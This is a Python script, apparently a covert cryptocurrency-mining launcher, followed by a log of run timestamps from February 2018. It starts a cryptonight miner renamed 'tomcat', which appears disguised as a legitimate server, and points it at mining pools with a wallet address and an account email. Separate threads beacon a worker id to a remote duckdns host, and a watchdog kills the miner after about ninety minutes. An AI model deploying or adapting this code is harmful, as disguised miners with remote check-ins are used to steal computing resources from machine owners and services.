import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:23:05.468633
#2018-02-17 16:10:01.568502
#2018-02-17 17:59:04.821154
#2018-02-17 19:48:02.159610
#2018-02-17 21:35:03.776286
#2018-02-17 23:19:03.962062
#2018-02-18 01:07:02.101933
#2018-02-18 02:53:06.150146
#2018-02-18 04:42:02.046088
#2018-02-18 06:34:01.613245
#2018-02-18 08:21:05.636669
#2018-02-18 10:09:02.093450
#2018-02-18 11:55:03.706481
#2018-02-18 13:40:07.857617
#2018-02-18 15:31:06.379125
#2018-02-18 17:19:04.794628
#2018-02-18 19:07:05.538745
#2018-02-18 20:53:04.538579
#2018-02-18 22:40:07.279948
#2018-02-19 00:29:05.822365
#2018-02-19 02:14:06.110051
#2018-02-19 04:02:01.360159
#2018-02-19 05:46:01.723197
#2018-02-19 07:36:04.009886
#2018-02-19 09:25:08.387066
#2018-02-19 11:14:08.154591
#2018-02-19 13:03:04.655944
#2018-02-19 14:49:02.179130
#2018-02-19 16:37:06.901674
#2018-02-19 18:25:09.931415
#2018-02-19 20:10:10.190575
#2018-02-19 22:00:05.664292
#2018-02-19 23:46:06.588447
#2018-02-20 01:33:07.647802
#2018-02-20 03:21:05.634362
#2018-02-20 05:09:05.634598
#2018-02-20 06:52:05.198863
#2018-02-20 08:38:04.727485
#2018-02-20 10:22:07.683321
#2018-02-20 12:06:07.519657
#2018-02-20 13:54:09.460460
#2018-02-20 15:39:07.228186
#2018-02-20 17:26:02.137229
#2018-02-20 19:15:10.862714
#2018-02-20 21:03:07.201595
#2018-02-20 22:49:01.435789
#2018-02-21 00:31:05.654671
#2018-02-21 02:16:08.043896
#2018-02-21 04:03:05.900160
#2018-02-21 05:50:02.791429
#2018-02-21 07:38:05.108107
#2018-02-21 09:23:04.020258
#2018-02-21 11:12:01.460503
#2018-02-21 13:00:11.867173
#2018-02-21 14:49:05.907188
#2018-02-21 16:38:08.382173
#2018-02-21 18:27:07.144551
#2018-02-21 20:12:04.067209
#2018-02-21 21:59:07.839910
#2018-02-21 23:46:06.414068
#2018-02-22 01:36:01.941786
#2018-02-22 03:24:04.008321
#2018-02-22 05:12:02.231064
#2018-02-22 06:56:03.992279
#2018-02-22 08:45:10.764484
#2018-02-22 10:33:04.128631
#2018-02-22 12:18:07.012773
#2018-02-22 14:04:01.701657
#2018-02-22 15:51:10.777544
#2018-02-22 17:38:08.082118
#2018-02-22 19:26:08.012028
#2018-02-22 21:19:07.777611
#2018-02-22 23:05:01.433759
#2018-02-23 00:51:01.411553
#2018-02-23 02:38:06.200308
#2018-02-23 04:28:07.424727
#2018-02-23 06:14:04.875454
#2018-02-23 07:59:07.760542
#2018-02-23 10:14:05.817338
#2018-02-23 12:07:02.220320
#2018-02-23 13:54:06.067712
#2018-02-23 15:47:07.362248
#2018-02-23 17:32:07.631449
#2018-02-23 19:18:06.940297
#2018-02-23 21:01:01.640214
#2018-02-23 22:48:01.686600
#2018-02-24 00:36:01.638766
#2018-02-24 02:26:04.850005
#2018-02-24 04:16:07.735765
#2018-02-24 06:04:05.173555
#2018-02-24 07:51:01.324528
#2018-02-24 09:35:07.622066
#2018-02-24 11:28:01.807695
#2018-02-24 13:18:01.491792
#2018-02-24 15:09:05.337449
#2018-02-24 16:58:04.195998
#2018-02-24 18:46:04.332026
#2018-02-24 20:37:06.861856
#2018-02-24 22:42:06.169212
#2018-02-25 01:49:05.893810
#2018-02-25 05:27:01.735099
#2018-02-25 11:35:01.769188